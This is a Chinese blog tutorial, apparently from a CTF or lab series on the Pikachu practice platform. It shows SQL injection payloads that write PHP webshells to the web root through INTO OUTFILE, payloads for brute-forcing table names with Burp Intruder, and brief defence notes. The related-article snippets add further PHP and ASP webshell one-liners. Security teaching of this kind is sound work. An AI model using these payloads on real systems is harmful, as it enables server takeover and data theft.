通过SQL inject漏洞写入恶意代码

最新推荐文章于 2022-07-22 17:29:25 发布
最新推荐文章于 2022-07-22 17:29:25 发布
阅读量243 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43858799/article/details/89317889
版权

一、sqli漏洞演示:
1.通过SQL inject漏洞写入恶意代码
在这里插入图片描述
默认情况下:secure_file_priv是关闭的

在这里插入图片描述
首先通过show global variables like ‘%secure%’;
然后切会pikachu做测试
在这里插入图片描述
获得操作系统权限:
allen’ union select " <?php @eval($_GET['test'])?>",2 into outfile “/var/www/html/1.php”#
allen’ union select " <?php system($_GET['cmd'])?>",2 into outfile “/var/www/html/2.php”#

into outfile 可以写入到 /var/www/html/1.php文件中去
将代码复制到输入框

在这里插入图片描述
前段是看不到什么现象的 但是访问后端可以看到已经被写入了
然后在浏览器中执行在这里插入图片描述

通过改变test=’ '中的值 就可以得到信息

再复制第二段代码放入框中
访问
在这里插入图片描述
可以得到相关文件
在这里插入图片描述
使用ifconfig 可以得到网卡的IP地址

这样就实现了远程控制了服务器

2.暴力破解在sqli漏洞中的应用
SQL Inject漏洞之表(列)名的暴力破解:
打开pikachu
在这里插入图片描述
暴力破解表明和列名称:
allen’ and exists(select * from aa)#
allen’ and exists(select id from users)#

复制第一条得到
在这里插入图片描述
pikachu里面不存在该表
打开bp进行抓包
在这里插入图片描述
将该包移到intruder中
在这里插入图片描述
添加变量 aa其实就是我们要通过字典撞库的表名
在这里插入图片描述
在这里插入图片描述
在这里通常是挂字典 但是由于是演示 就手动输入了几个 users是正确的表

打开options 找到下图 clear
添加 doesn’t exist
在这里插入图片描述
跑完之后
在这里插入图片描述

看到只有users没有doesn’t exist这个flag返回 证明已经猜对了表名是users
之后去猜列的名字 效果同理不再演示 复制第二段代码 抓包操作即可

3.SQL Inject漏洞防范
分为两个方面
在这里插入图片描述
在这里插入图片描述
并不是最好的方法 因为使用黑名单性质有局限性 数据库更新较快 无法防范新的特殊字符

在这里插入图片描述
网络层面:
在这里插入图片描述
使用云服务:
在这里插入图片描述

二、nmap的安装
现在nmap网站上下载好安装程序
选好路径进行下载
在这里插入图片描述
安装完成
在这里插入图片描述

放羊的弔弔
关注
专栏目录
sql-inject 通过一句话木马对服务器进行远程控制
北冥有鱼
04-03 698
1.一句话木马 说简单点,它就是利用各种语言提供的用来执行操作系统命令的函数去构造一个简单的木马程序,我们可以把这个函数直接写到一个文件里去,通过对这个文件的访问,去执行这个函数,向这个函数去传入我们想要进行的操作,这个函数会被执行,然后执行我们想要的操作 2.通过SQL Inject漏洞写入恶意代码 我们可以利用into oufile来传入我们的木马,但并不是很容易就可以传进去的,它是有前提条...
SQL注入之报错注入
帅醉了的博客
03-03 1232
0x00_报错注入原理 构造报错payload让信息通过报错信息回显出来。在查询不回现内容,会答应错误信息。Update、insert等语句,会打印错误信息。 0x01_报错注入操作 floor()报错注入 mysql模板: concat:连接字符串功能 floor:去整数值 rand:取0~1之间的随机浮点值 group by:根据一个或多个列对结果集进行分组并有排序功能 select coun...
sql写入恶意代码
weixin_48800344的博客
09-01 672
就是通过sql Inject漏洞写入恶意代码 一句话木马 php: <?php @eval($_POST['mxh']);?> asp: <%eval request(“mxh”)%> 里面’’ “” 又是一个新问题,hhh,不过经过研究了解了 select 1,2 into outfile “/var/www/html/1.php” **作用详解:**into outfile 将select 的结果写入到指定目录的文件中,然后访问获取权限,例如菜刀… 条件: 1.需要知道远程目
批量删除sql中被注入的恶意代码
weixin_34273481的博客
10-07 91
1,如果你的数据表很少的话,那么写几条简单的sql就搞定了 对于表中的nvchar类型的字段: 以下为引用的内容:update news set title=replace(title,'【恶意代码】','') 对于表中的text类型的字段: 以下为引用的内容:update news set content=Replace(Cas...
Sql-Inject盲注
qq_45680080的博客
11-03 217
什么是盲注 在有些情况下,后台使用了错误消息屏蔽方法(比如@ )屏蔽了报错 此时无法在根据报错信息来进行注入的判断。 这种情况下的注入,称为“盲注" 根据表现形式的不同,盲注又分为based boolean和based time两种类型 基于boolean的盲注主要表现症状: 0.没有报错信息 1.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1)(真与假) 2.在正确的...
【Web安全从入门到放弃】04_Sql-Inject漏洞
xhxtalent的博客
12-08 418
04_Sql-Inject漏洞 【Web安全从入门到放弃】01_暴力破解漏洞 【Web安全从入门到放弃】02_跨站脚本漏洞 【Web安全从入门到放弃】03_跨站请求伪造漏洞 SQL Inject漏洞原理概述 在owasp发布的top 10漏洞里面,注入漏洞一直是危害排名第一,其中主要指SQL Inject漏洞数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 攻击
Pikachu靶场-SQL Inject
qq_53083285的博客
11-10 5243
Pikachu靶场–Sql
基于pikachu漏洞平台的 --SQL注入攻击学习与总结
Mr.hu
10-16 1664
SQL注入攻击 基础知识 常见注释符号(官方链接): mysql> SELECT 1+1; # 行内注释 mysql> SELECT 1+1; -- 行内注释 mysql> SELECT 1 /*行内注释 */ + 1; mysql> SELECT 1+ /* 多行注释 */ 1; mysql> SELECT * FROM table1 WHERE a=1 /*! AND b=2 */ 其中/*! */ 里面的语句会被MySQL识别并执行,但是会被其他系统
漏洞分析SQL Injection Attack Lab(自用,记录)
weixin_48392428的博客
07-05 2148
SQL Injection Attack Lab1 Overview2 Lab Environment2.1 Environment Configuration2.2 Turn Off the Countermeasure2.3 Patch the Existing VM to Add the Web Application3 Lab Tasks3.1 Task 1: MySQL Console3.2 Task 2: SQL Injection Attack on SELECT Statement3.3 T
一般人不知道的sql优化技巧
Doug Wang的博客
07-06 372
一般人不知道的sql优化技巧
详解分页组件中查count总记录优化
q339549989的专栏
03-10 5180
1 背景 研究mybatis-plus(以下简称MBP),使用其分页功能时。发现了一个JsqlParserCountOptimize的分页优化处理类,官方对其未做详细介绍,网上也未找到分析该类逻辑的只言片语,这情况咱也不敢用呀,索性深度剖析一下,也方便他人。 2 原理 首先PaginationInterceptor分页拦截器的原理这里不累述(mybatis通用分页封装的实现原理挺简单的,也就那么回...
关于SQL inject (SQL注入漏洞的学习)
看穿黑暗的眼睛的博客
05-19 2843
何为SQL注入漏洞? 顾名思义是利用开发人员对用户提交的参数没有进行严格的过滤而导致用户可通过构造特殊的参数拼接SQL语句而执行意外的操作举个例子  比如网站有个查询用户的功能, 其查询语句如下 :select name from users where name=$name那么用户就可以通过 构造参数 1 or 1=1 来实现爆出所有用户  其最终查询语句如下 select name from ...
sql注入——读写文件
cxrpty的博客
02-10 3412
读写文件受到权限影响,权限是:secure_file_priv,权限的位置在数据库的配置文件my.ini中 1.secure_file_priv= 代表对文件读写没有限制 2.secure_file_priv=NULL 代表不能进行文件读写 3.secure_file_priv=d:/phpstudy/mysql 代表只能对该路径下文件进...
MySQL数据库渗透及漏洞利用总结
05-09 4215
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
常见web漏洞——SQL注入
m0_55854679的博客
04-18 2662
pikachu漏洞练习平台(SQLInject) 概述 SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞: 1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入; 2.使用参数化(Parameterized Query 或 Parameterized Statem
Mybatis Plus 自定义方法实现分页
热门推荐
呆萌Di狍子
08-13 1万+
一般物理分页,即通过sql语句分页,都是在sql语句后面添加limit分页语句,在xml文件里传入分页的参数,再多配置一条sql,用于查询总数: <select id="queryStudentsBySql" parameterType="map" resultMap="studentmapper"> select * from student limit ...
mybatis-plus分页插件(PaginationInnerInterceptor)报错的问题
chengqwertyuiop的博客
07-22 6437
mybatis-plus使用PaginationInnerInterceptor分页插件,在调用分页查询方法时报如下错误:PaginationInnerInterceptor : optimize this sql to a count sql has exception, sql:"sql语句略", exception:net.sf.jsqlparser.parser.ParseException: Encountered unexpected token: "," ","...
python 自然语言分析第六周作业
云金杞
04-23 1117
"""写一个程序按长度对词排序。定义一个辅助函数 cmp_len,它在词长上使用 cmp 比较函数""" def cmp_len(a,b): if len(a)>=len(b): s=a if len(a)<len(b): s=b return s words=['I','love','NPL'] def cmp(words): wo
BugkuCTF web extract变量覆盖
H4ppyD0g的博客
09-15 329
<?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> extract() 函数从数组中将变量导入到当前的符...
pikachu靶场通关sql-inject
最新发布
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值